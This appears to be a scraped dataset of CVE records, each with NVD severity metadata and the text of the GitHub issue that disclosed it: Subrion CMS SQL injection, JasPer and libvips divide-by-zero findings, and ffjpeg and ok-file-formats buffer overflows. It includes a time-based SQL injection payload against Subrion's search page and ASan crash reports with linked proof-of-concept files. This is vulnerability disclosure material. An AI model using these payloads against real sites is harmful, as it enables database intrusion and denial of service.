2019-03-25T23:51:29Z
https://github.com/thinkcmf/thinkcmf/issues/580
424,828,877
580
2,195
CVE-2020-18155
2021-07-14T20:15:12.873
SQL Injection vulnerability in Subrion CMS v4.2.1 in the search page if a website uses a PDO connection.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/817" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/817" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion:4.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "E9C1813C-DBF7-4ADF-8FC0-23608A417D29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/intelliants/subrion/issues/817
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
**I. Vulnerability Analysis** Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli. They are executed by three files in the /includes/classes/ directory. ia.core.mysql.php ia.core.mysqli.php ia.core.pdo.php If a website uses PDO connection, there will be a vulnerability. **II. Vulnerability testing** Using PDO connections requires modifying the file---- /includes/config. inc. php. Change mysqli to pdo. ![database_config](https://user-images.githubusercontent.com/47202604/55471964-90921f80-563d-11e9-95cd-ca1f97458927.png) In the search page: http://cms.im/search/ POC and testing: `/search/?q=);select%20sleep(1);--+` ![sleep(1)](https://user-images.githubusercontent.com/47202604/55471980-9ee03b80-563d-11e9-8ed5-dd970c9fe096.png) `/search/?q=);select%20sleep(5);--+` ![sleep(5)](https://user-images.githubusercontent.com/47202604/55472008-ab649400-563d-11e9-89b8-74f873608223.png) `/search/?q=);select%20sleep(10);--+` ![sleep(10)](https://user-images.githubusercontent.com/47202604/55472027-b4556580-563d-11e9-807d-e9fb5e7a241b.png)
There is a time-based sql injection if use PDO
https://api.github.com/repos/intelliants/subrion/issues/817/comments
2
2019-04-03T10:24:41Z
2019-04-24T06:00:46Z
https://github.com/intelliants/subrion/issues/817
428,687,061
817
2,196
CVE-2021-27845
2021-07-15T16:15:09.457
A Divide-by-zero vulnerability exists in JasPer Image Coding Toolkit 2.0 in jasper/src/libjasper/jpc/jpc_enc.c
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jasper-software/jasper/issues/194" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jasper-software/jasper/issues/194" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jasper_project:jasper:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF3018D6-8D7F-4A28-A555-53D55CF77FEE", "versionEndExcluding": "2.0.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/jasper-software/jasper/issues/194
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jasper-software", "jasper" ]
Hi all, Our bug scanner has reported some bugs. Bug triggering files are attached. **Bug-1:div/mod-zero** 1. in function `cp_create`,[jpc_enc.c#749](https://github.com/mdadams/jasper/blob/master/src/libjasper/jpc/jpc_enc.c) `if (jpc_fixtodbl(tcp->ilyrrates[lyrno]) > ((double) cp->totalsize)/ cp->rawsize) { jas_eprintf("warning: intermediate layer rates must be less than overall rate\n"); goto error; }` Divisor: rawsize Result: Could be 0, Please Check. 2. in function `jjpc_dec_tileinit`, [jpc_dec.c#736~#738](https://github.com/mdadams/jasper/blob/master/src/libjasper/jpc/jpc_dec.c) `if (!(tcomp->data = jas_seq2d_create(JPC_CEILDIV(tile->xstart, cmpt->hstep), JPC_CEILDIV(tile->ystart, cmpt->vstep), JPC_CEILDIV(tile->xend, cmpt->hstep), JPC_CEILDIV(tile->yend, cmpt->vstep)))) { return -1; }` Divisor: cmpt->hstep, cmpt->vstep Result: Could be 0, Please Check. 3.in function `jpc_dec_process_siz`, [jpc_dec.c#1270~#1273,#1339~#1342](https://github.com/mdadams/jasper/blob/master/src/libjasper/jpc/jpc_dec.c) `if (!(tcomp->data = jas_seq2d_create(JPC_CEILDIV(tile->xstart, cmpt->hstep), JPC_CEILDIV(tile->ystart, cmpt->vstep), JPC_CEILDIV(tile->xend, cmpt->hstep), JPC_CEILDIV(tile->yend, cmpt->vstep)))) { return -1; }` ` cmpt->width = JPC_CEILDIV(dec->xend, cmpt->hstep) - JPC_CEILDIV(dec->xstart, cmpt->hstep); cmpt->height = JPC_CEILDIV(dec->yend, cmpt->vstep) - JPC_CEILDIV(dec->ystart, cmpt->vstep);` ` tcomp->xstart = JPC_CEILDIV(tile->xstart, cmpt->hstep); tcomp->ystart = JPC_CEILDIV(tile->ystart, cmpt->vstep); tcomp->xend = JPC_CEILDIV(tile->xend, cmpt->hstep); tcomp->yend = JPC_CEILDIV(tile->yend, cmpt->vstep);` Divisor: cmpt->hstep, cmpt->vstep Result: Could be 0, Please Check. 4.in function `jas_cmxform_apply`, [jas_cm.c#542](https://github.com/mdadams/jasper/blob/master/src/libjasper/base/jas_cm.c) ` *bufptr = (v - bias) / scale;` Divisor: scale Result: Could be 0, Please Check.
bugs found by our bug scanner
https://api.github.com/repos/jasper-software/jasper/issues/194/comments
4
2019-02-18T06:33:54Z
2021-07-19T05:33:04Z
https://github.com/jasper-software/jasper/issues/194
411,321,742
194
2,197
CVE-2021-27847
2021-07-15T16:15:09.493
Division-By-Zero vulnerability in Libvips 8.10.5 in the function vips_eye_point, eye.c#L83, and function vips_mask_point, mask.c#L85.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libvips/libvips/issues/1236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libvips/libvips/issues/1236" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libvips:libvips:8.10.5:*:*:*:*:*:*:*", "matchCriteriaId": "20046851-6B83-4276-938A-5D3499EA3EAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/libvips/libvips/issues/1236
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libvips", "libvips" ]
Hi, we developed a taint analysis based static analysis tool named Vanguard. It could prognosis potential vulnerabilities by identifying security-sensitive operations (e.g. divide-zero, mod-zero, array-index-access, and sensitive function calls) without proper checks for their operands. Some code locations are listed in the following. We think these locations maybe bugs after our manual analysis. Please check them, and add precondition checks if necessary. **Divide/Mod-Zero** 1.in function `vips_zoom_gen`, [zoom.c#L260#L266#L275](https://github.com/libvips/libvips/blob/master/libvips/conversion/zoom.c#L260) ```c++ left = VIPS_ROUND_DOWN( r->left, zoom->xfac ); right = VIPS_ROUND_UP( ri, zoom->xfac ); top = VIPS_ROUND_DOWN( r->top, zoom->yfac ); bottom = VIPS_ROUND_UP( bo, zoom->yfac ); ``` ```c++ s.left = left / zoom->xfac; s.top = top / zoom->yfac; s.width = width / zoom->xfac; s.height = height / zoom->yfac; ``` ```c++ left = VIPS_ROUND_UP( r->left, zoom->xfac ); right = VIPS_ROUND_DOWN( ri, zoom->xfac ); top = VIPS_ROUND_UP( r->top, zoom->yfac ); bottom = VIPS_ROUND_DOWN( bo, zoom->yfac ); ``` Divisor: zoom->xfac, zoom->yfac Result: Could be 0, Please Check. 2.in function `vips_point_build`, [point.c#L105](https://github.com/libvips/libvips/blob/master/libvips/create/point.c#L105) ```c++ float range = max - min; if( vips_linear1( in, &t[2], 255.0 / range, -min * 255.0 / range, "uchar", TRUE, NULL ) ) return( -1 ); in = t[2]; ``` Divisor: range Result: Could be 0, Please Check. 3.in function `vips_eye_point`, [eye.c#L83](https://github.com/libvips/libvips/blob/master/libvips/create/eye.c#L83) ```c++ double h = ((point->height - 1) * (point->height - 1)); return( y * y * cos( c * x * x ) / h ); ``` Divisor: h Result: Could be 0, Please Check. 4.in function `vips_mask_point`, [mask.c#L85](https://github.com/libvips/libvips/blob/master/libvips/create/mask.c#L85) ```c++ dx = (double) x / half_width; dy = (double) y / half_height; ``` Divisor: half_width, half_height Result: Could be 0, Please Check. **Array-Index-Bound** 1.in function `vips_gamma_build`, [gamma.c#L97](https://github.com/libvips/libvips/blob/master/libvips/conversion/gamma.c#L97) ```c++ scale = pow( vips_gamma_maxval[in->BandFmt], 1.0 / gamma->exponent ) / vips_gamma_maxval[in->BandFmt]; ``` Array expression: vips_gamma_maxval[in->BandFmt] needs bound checking: 0<=in->BandFmt<10 2.in function `vips_byteswap_gen`, [byteswap.c#L138](https://github.com/libvips/libvips/blob/master/libvips/conversion/byteswap.c#L138) ```c++ SwapFn swap = vips_byteswap_swap_fn[im->BandFmt]; ``` Array expression: vvips_byteswap_swap_fn[im->BandFmt] needs bound checking: 0<=in->BandFmt<10 3.in function `vips_byteswap_build`,[byteswap.c#L169](https://github.com/libvips/libvips/blob/master/libvips/conversion/byteswap.c#L169) ```c++ if( byteswap->in->Coding != VIPS_CODING_NONE || !vips_byteswap_swap_fn[byteswap->in->BandFmt] ) return( vips_image_write( byteswap->in, conversion->out ) ); ``` Array expression: vips_byteswap_swap_fn[im->BandFmt] needs bound checking: 0<=in->BandFmt<10 **Sensitive-Function-Call** 1.in function `find_header`,[ unpack_seek.c#L289](https://github.com/dbry/WavPack/blob/9ccc3fe4a37d069137ceabe513a4dd9b0a09c1c2/src/unpack_seek.c#L289) ```c++ memcpy (wphdr, sp - 4, sizeof (*wphdr)); ``` [memcpy] is a security-sensitive function using tainted data: [wphdr ] 2.in function `rtiff_memcpy_line`,[ tiff2vips.c#L1219](https://github.com/libvips/libvips/blob/master/libvips/foreign/tiff2vips.c#L1219) ```c++ memcpy( q, p, len ); ``` [memcpy] is a security-sensitive function using tainted data: [len ] 3.in function `tile_copy`,[ sinkscreen.c#L843](https://github.com/libvips/libvips/blob/master/libvips/iofuncs/sinkscreen.c#L843) ```c++ memcpy( q, p, len ); ``` [memcpy] is a security-sensitive function using tainted data: [len ] 4.in function `vips_region_paint`,[ region.c#L958#L987](https://github.com/libvips/libvips/blob/master/libvips/iofuncs/region.c#L958) ```c++ memset( (char *) q, value, wd ); ``` ```c++ memcpy( (char *) q1, (char *) q, wd ); ``` [memset] is a security-sensitive function using tainted data: [wd ] [memcpy] is a security-sensitive function using tainted data: [wd ]
bugs found by our scanner
https://api.github.com/repos/libvips/libvips/issues/1236/comments
3
2019-02-20T13:19:56Z
2021-07-16T08:35:43Z
https://github.com/libvips/libvips/issues/1236
412,421,346
1,236
2,198
CVE-2020-23705
2021-07-15T22:15:09.197
A global buffer overflow vulnerability in jfif_encode at jfif.c:701 of ffjpeg through 2020-06-22 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "949770FC-6A53-4A2F-8F86-E8E01330515F", "versionEndExcluding": null, "versionEndIncluding": "2020-06-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/rockcarry/ffjpeg/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
### Describe A global-buffer-overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at jfif.c:701 ### Reproduce Tested in Ubuntu 18.04, 64bit. Compile ffjpeg with address sanitizer as I changed `CCFLAGS` src/Makefile as: ```bash # ASan CCFLAGS = -Wall -g -fsanitize=address -fno-omit-frame-pointer -O1 ``` And do this command to reproduce this issue: `ffjpeg -e $poc` [poc is here](https://github.com/WayneDevMaze/afl_test_works/blob/master/ffjpeg/poc/global-buffer-overflow-poc1) ### Expected behavior An attacker can exploit this vulnerability by submitting a malicious jpeg that exploits this issue. This will result in a Denial of Service (DoS) and when the application attempts to process the file. ### ASAN Reports ```bash ==81140==ERROR: AddressSanitizer: global-buffer-overflow on address 0x56063a6c1b92 at pc 0x7f2c96918733 bp 0x7ffe503e7fe0 sp 0x7ffe503e7788 READ of size 272 at 0x56063a6c1b92 thread T0 #0 0x7f2c96918732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x56063a6a88e7 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x56063a6a88e7 in jfif_encode /root/study/ffjpeg/src/jfif.c:701 #3 0x56063a69b382 in main /root/study/ffjpeg/src/ffjpeg.c:30 #4 0x7f2c964cfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x56063a69b829 in _start (/root/study/ffjpeg/test/ffjpeg+0x2829) 0x56063a6c1b92 is located 0 bytes to the right of global variable 'STD_HUFTAB_LUMIN_AC' defined in 'huffman.c:388:12' (0x56063a6c1ae0) of size 178 SUMMARY: AddressSanitizer: global-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0ac1474d0320: 00 00 00 00 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 0x0ac1474d0330: 00 00 00 04 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0ac1474d0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 f9 0x0ac1474d0350: f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9 00 00 00 00 0x0ac1474d0360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ac1474d0370: 00 00[02]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0ac1474d0380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ac1474d0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ac1474d03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ac1474d03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ac1474d03c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==81140==ABORTING ```
global-buffer-overflow in function jfif_encode at jfif.c:701
https://api.github.com/repos/rockcarry/ffjpeg/issues/25/comments
1
2020-06-22T08:20:48Z
2020-08-07T00:30:39Z
https://github.com/rockcarry/ffjpeg/issues/25
642,861,272
25
2,199
CVE-2020-23706
2021-07-15T22:15:09.240
A heap-based buffer overflow vulnerability in the function ok_jpg_decode_block_subsequent_scan() ok_jpg.c:1102 of ok-file-formats through 2020-06-26 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:*:*:*:*:*:*:*:*", "matchCriteriaId": "B30BC8B8-FE65-4A39-92D6-AFEDD299D86A", "versionEndExcluding": null, "versionEndIncluding": "2020-06-26", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Describe A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_jpg_decode_block_subsequent_scan() at ok_jpg.c:1102 # Reproduce **test program** ```C #include <stdio.h> #include <stdlib.h> #include "ok_mo.h" #include "ok_jpg.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_jpg image = ok_jpg_read(file, OK_JPG_COLOR_FORMAT_RGBA); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` Tested in Ubuntu 18.04, 64bit. Compile test program with address sanitizer with this command: ```bash gcc -g -fsanitize=address -fno-omit-frame-pointer -O1 -o Asanjpg main.c ok_jpg.c ok_jpg.h ``` You can get program [here](https://github.com/WayneDevMaze/afl_test_works/blob/master/OKfileformat/Asanjpg/Asanjpg). # ASan Reports ```bash ./Asanjpg crash/jpg-heap-buffer-overflow-1 ``` Get ASan reports ```bash ==98287==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000039680 at pc 0x562394639b54 bp 0x7ffee24654e0 sp 0x7ffee24654d0 READ of size 2 at 0x631000039680 thread T0 #0 0x562394639b53 in ok_jpg_decode_block_subsequent_scan /root/study/ok-file-formats/afl-test/ok_jpg.c:1102 #1 0x56239463b11f in ok_jpg_decode_scan /root/study/ok-file-formats/afl-test/ok_jpg.c:1238 #2 0x56239463fc60 in ok_jpg_read_sos /root/study/ok-file-formats/afl-test/ok_jpg.c:1734 #3 0x562394640d3c in ok_jpg_decode2 /root/study/ok-file-formats/afl-test/ok_jpg.c:1900 #4 0x562394641605 in ok_jpg_decode /root/study/ok-file-formats/afl-test/ok_jpg.c:1990 #5 0x5623946308a4 in ok_jpg_read_with_allocator /root/study/ok-file-formats/afl-test/ok_jpg.c:268 #6 0x56239463071b in ok_jpg_read /root/study/ok-file-formats/afl-test/ok_jpg.c:257 #7 0x56239462fd5e in main /root/study/ok-file-formats/afl-test/main.c:8 #8 0x7fe63f9a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x56239462fb29 in _start (/root/study/ok-file-formats/afl-test/Asanjpg/Asanjpg+0x2b29) 0x631000039680 is located 113 bytes to the right of 69135-byte region [0x631000028800,0x63100003960f) allocated by thread T0 here: #0 0x7fe63fe52b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x56239462ff00 in ok_stdlib_alloc /root/study/ok-file-formats/afl-test/ok_jpg.c:55 #2 0x56239463eb20 in ok_jpg_read_sof /root/study/ok-file-formats/afl-test/ok_jpg.c:1595 #3 0x562394640ac2 in ok_jpg_decode2 /root/study/ok-file-formats/afl-test/ok_jpg.c:1884 #4 0x562394641605 in ok_jpg_decode /root/study/ok-file-formats/afl-test/ok_jpg.c:1990 #5 0x5623946308a4 in ok_jpg_read_with_allocator /root/study/ok-file-formats/afl-test/ok_jpg.c:268 #6 0x56239463071b in ok_jpg_read /root/study/ok-file-formats/afl-test/ok_jpg.c:257 #7 0x56239462fd5e in main /root/study/ok-file-formats/afl-test/main.c:8 #8 0x7fe63f9a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/study/ok-file-formats/afl-test/ok_jpg.c:1102 in ok_jpg_decode_block_subsequent_scan Shadow bytes around the buggy address: 0x0c627ffff280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff2c0: 00 07 fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c627ffff2d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff2e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==98287==ABORTING ``` # Poc Poc file is [here](https://github.com/WayneDevMaze/afl_test_works/blob/master/OKfileformat/Asanjpg/crash/jpg-heap-buffer-overflow-1). # Fuzzer & Testcase Fuzzer is AFL. Testcase is your [testcase](https://github.com/brackeen/ok-file-formats/tree/master/test/jpg) in dir ok-file-formats/test/jpg.
heap-buffer-overflow in function ok_jpg_decode_block_subsequent_scan() at ok_jpg.c:1102
https://api.github.com/repos/brackeen/ok-file-formats/issues/7/comments
2
2020-06-26T12:25:34Z
2021-07-19T05:36:54Z
https://github.com/brackeen/ok-file-formats/issues/7
646,227,215
7
2,200
CVE-2020-23707
2021-07-15T22:15:09.267
A heap-based buffer overflow vulnerability in the function ok_jpg_decode_block_progressive() at ok_jpg.c:1054 of ok-file-formats through 2020-06-26 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
